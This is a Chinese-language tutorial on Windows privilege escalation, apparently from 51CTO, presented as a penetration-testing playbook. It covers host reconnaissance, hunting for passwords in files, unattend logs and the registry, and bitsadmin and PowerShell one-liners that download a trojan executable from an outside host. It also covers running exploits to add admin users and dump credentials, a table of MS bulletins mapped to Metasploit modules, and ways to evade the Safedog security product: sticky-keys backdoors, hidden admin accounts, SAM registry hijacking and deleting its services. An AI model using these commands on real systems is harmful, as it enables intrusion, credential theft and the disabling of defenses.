Windows提權基礎:信息收集技巧及可用漏洞搜索
原創【51CTO.com原創稿件】在滲透過程中很多人都認為Windows提權很難,其核心是掌握的基礎不夠扎實,當然除了極為變態的權限設置的服務器,基本上筆者遇到的服務器99%都提權成功了,本文收集整理一些跟提權緊密相關的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞對應msf下的模塊以及操作系統可提權的版本。
一、Windows提權信息收集
1. 收集OS名稱和版本信息
- systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"
2. 主機名稱和所有環境變量
- 主機名稱:hostname
- 環境變量:SET
3. 查看用戶信息
- 查看所有用戶:net user 或者net1 user
- 查看管理員用戶組:net localgroup administrators或者net1 localgroup administrators
- 查看遠程終端在線用戶:query user 或者quser
4. 查看遠程端口
(1)注冊表查看
- REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
(2)通過命令行查看
- 獲取對應的PID號:tasklist /svc | find "TermService"
- 通過PID號查找端口:netstat -ano | find "1980"
5. 查看網絡情況
(1)網絡配置情況:ipconfig /all
(2)路由器信息: route print
(3)要查看ARP緩存: arp -A
(4)查看網絡連接: netstat -ano
(5)要查看防火墻規則:
- netsh firewall show config
- netsh firewall show state
6. 應用程序和服務
(1)要查看服務的進程ID:tasklist /SVC
(2)已安裝驅動程序的列表:DRIVERQUERY
(3)已經啟動Windows 服務net start
(4)查看某服務啟動權限:sc qc TermService
(5)已安裝程序的列表:wmic product list brief
(6)查看服務列表:wmic service list brief # Lists services
(7)查看進程列表wmic process list brief # Lists processes
(8)查看啟動程序列表wmic startup list brief # Lists startup items
(9)檢查補丁已安裝的更新和安裝日期
- wmic qfe get Caption,De**ion,HotFixID,InstalledOn
搜索,您可以使用提升權限的特定漏洞:
- wmic qfe get Caption,De**ion,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"
執行上面的命令的沒有輸出,意味著那個補丁未安裝。
(10)結束程序:
- wmic process where name="iexplore.exe" call terminate
7. 檢索敏感文件
- dir /b/s password.txt
- dir /b /s *.doc
- dir /b /s *.ppt
- dir /b /s *.xls
- dir /b /s *. docx
- dir /b /s *.xlsx
- dir /b/s config.* filesystem
- findstr /si password *.xml *.ini *.txt
- findstr /si login *.xml *.ini *.txt
除此之外,您還可以檢查無人值守安裝日志文件。這些文件通常包含base64編碼的密碼。你更可能在大型企業中,其中單個系統的手動安裝是不切實際的,找到這些文件即可獲取管理員密碼。這些文件的共同位置是:
- C:\sysprep.inf
- C:\sysprep\sysprep.xml
- C:\Windows\Panther\Unattend\Unattended.xml
- C:\Windows\Panther\Unattended.xml
8. 目錄文件操作
(1)列出d:\www的所有目錄:
- for /d %i in (d:\www\*) do @echo %i
(2)把當前路徑下文件夾的名字只有1-3個字母的顯示出來:
- for /d %i in (???) do @echo %i
(3)以當前目錄為搜索路徑,把當前目錄與下面的子目錄的全部EXE文件列出:
- for /r %i in (*.exe) do @echo %i
(4)以指定目錄為搜索路徑,把當前目錄與下面的子目錄的所有文件列出
- for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
(5)顯示a.txt里面的內容,因為/f的作用,會讀出a.txt中:
- for /f %i in (c:\1.txt) do echo %i
9. RAR打包
- rar a -k -r -s -m3 c:\1.rar d:\wwwroot
10. php讀文件
- c:/php/php.exe "c:/www/admin/1.php"
11. Windows7及以上的版本操作系統文件下載可以使用的bitsadmin和powershell:
- bitsadmin /transfer myjob1 /download /priority normal http://www.antian365.com/lab/4433.exe c:\ma.exe
- powershell (new-object System.Net.WebClient).DownloadFile(' http://www.antian365.com/ma.exe','ma.exe')
12. 注冊表關鍵字搜索,password為關鍵字,可以是vnc等敏感關鍵字
- reg query HKLM /f password /t REG_SZ /s
- reg query HKCU /f password /t REG_SZ /s
13.系統權限配置
- cacls c:\
- cacls c:\windows\ma.exe 查看ma.exe的權限配置
14.自動收集系統有用信息腳本
- for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
- wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
- wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
- wmic USERACCOUNT list full /format:"%var%" >> out.html
- wmic group list full /format:"%var%" >> out.html
- wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
- wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
- wmic netuse list full /format:"%var%" >> out.html
- wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
- wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
- wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
- wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
- wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
二、Windows提權準備
通過前面的基礎命令以及本章的第二章節,可以有針對性的對目標開展提權工作,根據Windows-Exploit-Suggester獲取目前系統可能存在的漏洞。
1. 收集并編譯相關POC
2. 若操作系統有殺毒軟件以及安全防護軟件,則需要對提權POC進行免殺,否則進行下一步。
3. 上傳POC
4. 有webshell或者反彈webshell來執行命令
5. 搜索漏洞,根據關鍵字進行搜索例如MS10-061。
(1)在百度瀏覽器中搜索“MS10-061 site:exploit-db.com”
(2)packetstormsecurity網站搜索
https://packetstormsecurity.com/search/?q=MS16-016
(3)安全焦點,其BugTraq是一個出色的漏洞和exploit數據源,可以通過CVE編號,或者產品信息漏洞直接搜索。網址:http://www.securityfocus.com/bid。
三、使用msf平臺搜索可利用POC
1. 搜索poc
在kali中打開msf或者執行“/usr/bin/msfconsole”,在出來的命令提示符下使用命令進行搜索:
- search ms08
- search ms09
- search ms10
- search ms11
- search ms12
- search ms13
- search ms14
- search ms15
- search ms16
- search ms17
以上命令將搜索2008年至2017年的所有可用的Windows下的exploit,例如搜索2015年的exploit,如圖1所示。
圖1搜索2015年所有可用的0day
2. 查看相關漏洞情況
可以通過微軟官方網站查看漏洞對應的版本,利用方式為https://technet.microsoft.com/library/security/漏洞號,例如查看ms08-068則其網頁打開方式為:https://technet.microsoft.com/library/security/ms08-068,如圖2所示,如果顯示為嚴重則表明可以被利用。
圖2微軟官方對應版本號
四、實施提權
執行命令。比如可利用poc文件為poc.exe,則可以使用如下的一些命令提權:
(1)直接執行木馬。
- poc.exe ma.exe
(2)添加用戶
- poc.exe "net user antian365 1qaz2wsx /add"
- poc.exe "net localgroup administrators antian365 /add"
(3)獲取明文密碼或者哈希值
- poc.exe "wce32.exe -w"
- poc.exe "wce64.exe -w"
- poc.exe "wce32"
五、相關資源下載
1. Tools下載
wce下載:
- http://www.ampliasecurity.com/research/windows-credentials-editor/
- http://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
- http://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
- sysinternals :https://technet.microsoft.com/en-us/sysinternals/bb842062
- mimikatz :http://blog.gentilkiwi.com/mimikatz
- python :https://www.python.org/downloads/windows/
2. 搜索漏洞和shellcode
- http://www.exploit-db.com
- http://1337day.com
- http://0day.today
- http://www.securityfocus.com
- http://seclists.org/fulldisclosure/
- http://www.exploitsearch.net
- http://www.securiteam.com
- http://metasploit.com/modules/
- http://securityreason.com
- https://cxsecurity.com/exploit/
- http://securitytracker.com/
六、Windows本地溢出漏洞對應表
Windows2003對應漏洞、編號及其影響系統及msf模塊
1. 2007年對應漏洞、編號及其影響系統及msf模塊
- (1)KB935966 |MS07-029 Win2000SP4、Win2003SP1/SP2 exploit/windows/dcerpc/ms07_029_msdns_zonename
- exploit/windows/smb/ms07_029_msdns_zonename
- (2)KB937894| MS07-065 WinxpSP2、Win2000SP4、WinXP-x64-SP2、Win2003SP1/SP2
- exploit/windows/dcerpc/ms07_065_msmq
- (3)KB941568|MS07-064 Win2000SP4
- exploit/windows/misc/ms07_064_sami
- (4)KB944653|MS07-067 WinXPSP2、WinXP-x64-SP2、Win2003SP1/SP2
2. 2008年對應漏洞、編號及其影響系統及msf模塊
- (1)KB958644 |MS08-067 Win2000SP4、WinXP-SP2/SP3、
- WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2
- exploit/windows/smb/ms08_067_netapi
- (2)KB 957097| MS08-068 Win2000SP4、WinXP-SP2/SP3、
- WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2
- exploit/windows/smb/smb_relay
3. 2009年對應漏洞、編號及其影響系統及msf模塊
- (1)KB952004|MS09-012 PR Win2003/2008
- (2)KB956572|MS09-012烤肉
- (3)KB970483|MS09-020 IIS6
- (4)KB971657|MS09-041 WinXP、Win2003提權
- (5)KB975254|MS09-053 IIS5遠程溢出,Windows2000SP4,Win2003及Win2008拒絕服務。
- (6)KB975517 |MS09-050 Vista、Win2008-32/SP2、Win2008-64/SP2
- exploit/windows/smb/ms09_050_smb2_negotiate_func_index
4. 2010年對應漏洞、編號及其影響系統及msf模塊
- (1)KB977165|MS10-015 Vista、Win2003-32-64/SP2、Win2008-32-64/SP2
- exploit/windows/local/ms10_015_kitrap0d
- (2)KB 2347290|MS10-061 Winxp3、Winxp64sp2、Win2003-32-64 SP2、Win2008-32-64 SP2
- (3)KB2360937|MS10-084 Winxp3、Winxp64sp2、Win2003-32-64 SP2
- (4)KB2305420| MS10-092 Win7-32-64、Win2008-32-64、Win2008R2-32-64
- exploit/windows/local/ms10_092_schelevator
- (5)KB2124261|KB2271195 MS10-065 IIS7
5. 2011年對應漏洞、編號及其影響系統及msf模塊
- (1)KB2393802|MS11-011
- Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2
- (2)KB2478960|MS11-014
- Winxp32-64-SP3、Win2003-32-64-SP2
- (3)KB2507938|MS11-056
- Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2
- (4)KB2566454|MS11-062
- Winxp32-64-SP3、Win2003-32-64-SP2
- (5)KB2620712|MS11-097
- Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1
- (6)KB2503665|MS11-046
- Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1
- (7)KB2592799|MS11-080
- Winxp-SP3、Win2003-SP2
- exploit/windows/local/ms11_080_afdjoinleaf
6. 2012年對應漏洞、編號及其影響系統及msf模塊
- (1)KB2711167| KB2707511|KB2709715|MS12-042 sysret –pid
- Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012
- (2)KB2621440|MS12-020 Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、
7. 2013年對應漏洞、編號及其影響系統及msf模塊
- (1)KB2778930|MS13-005 Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012
- exploit/windows/local/ms13_005_hwnd_broadcast
- (2)KB2840221|MS13-046 WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012、Win2012R2
- (3)KB2850851|MS13-053 EPATHOBJ 0day,WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012
- exploit/windows/local/ms13_053_schlamperei
8. 2014年對應漏洞、編號及其影響系統及msf模塊
- (1)KB 2914368 |MS14-002 WinXPSP3、WinXP-64-SP2、Win2003-32-64-sp2
- exploit/windows/local/ms_ndproxy
- (2)KB 2916607|MS14-009 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/local/ms14_009_ie_dfsvc
- (3)KB3000061|MS14-058 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/local/ms14_058_track_popup_menu
- (4)KB 2989935|MS14-070 Win2003-32-64-SP2
- exploit/windows/local/ms14_070_tcpip_ioctl
9. 2015年對應漏洞、編號及其影響系統及msf模塊
- (1)KB3023266|MS15-001 Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/local/ntapphelpcachecontrol
- (2)KB3025421|MS15_004、Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/local/ms15_004_tswbproxy
- (3)KB3041836|MS15-020、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/smb/ms15_020_shortcut_icon_dllloader
- (4)KB3057191|MS15-051
- Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/local/ms15_051_client_copy_image
- (5)KB3077657|MS15-077
- Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- (6)KB 3079904|MS15_078
- Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/local/ms15_078_atmfd_bof
- (7)KB3079904|MS15-097
- Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2
- exploit/windows/smb/ms15_020_shortcut_icon_dllloader
10. 2016年對應漏洞、編號及其影響系統及msf模塊
- (1)KB3134228|MS16-014 Win2008、Win7、Win2012
- (2)KB3124280|MS16-016 WebDAV提權漏洞,Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64
- exploit/windows/local/ms16_016_webdav
- (3)KB3139914|MS16-032、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64
- exploit/windows/local/ms16_032_secondary_logon_handle_privesc
- Windows 2003 SP2 安裝了MS10-046補丁,可用ms15_020進行溢出
- Windows 2008 SP2 (32 bits)安裝了MS14-027補丁可用ms15_020進行溢出
七、過安全狗
1. vbs法
將以下代碼保存為1.vbs然后執行cscript 1.vbs
- Set o=CreateObject( "Shell.Users" )
- Set z=o.create("user")
- z.changePassword "1qaz2WSX12",""
- z.setting("AccountType")=3
2. shift后門法
- copy C:\sethc.exe C:\windows\system32\sethc.exe
- copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe
3. for循環添加帳號法
- for /l %%i in (1,1,100) do @net user temp asphxg /add&@net localgroup administrators temp /add
4. 修改注冊表法
administrator對應值是1F4,GUEST是1F5。
(1)使用net1 user guset 1 ,將guest密碼重置為1,無需過問是guest否禁用
(2)執行:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"
導出administrator的注冊表值到某路徑,修改內容,將"V"值刪除,只留F值,將1F4修改為1F5,保存。
(3)執行regedit /s C:\RECYCLER\1.reg 導入注冊表
就可以使用,guest 密碼1登陸了。
5. 直接修改管理員密碼法,盡量不用這招,實在沒有辦法就用這個。
- net user administrator somepwd
6. 刪除與停止安全狗相關服務法
如果是system權限可以采取以下方法停止安全狗
(1)停止安全狗相關服務
- net stop "Safedog Guard Center" /y
- net stop "Safedog Update Center" /y
- net stop "SafeDogCloudHelper" /y
(2)直接刪除SafeDogGuardCenter服務
- sc stop "SafeDogGuardCenter"
- sc config "SafeDogGuardCenter" start= disabled
- sc delete "SafeDogGuardCenter"
- sc stop " SafeDogUpdateCenter"
- sc config " SafeDogUpdateCenter" start= disabled
- sc delete " SafeDogUpdateCenter"
- sc stop " SafeDogCloudHelper"
- sc config " SafeDogCloudHelper" start= disabled
- sc delete " SafeDogCloudHelper"
【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】
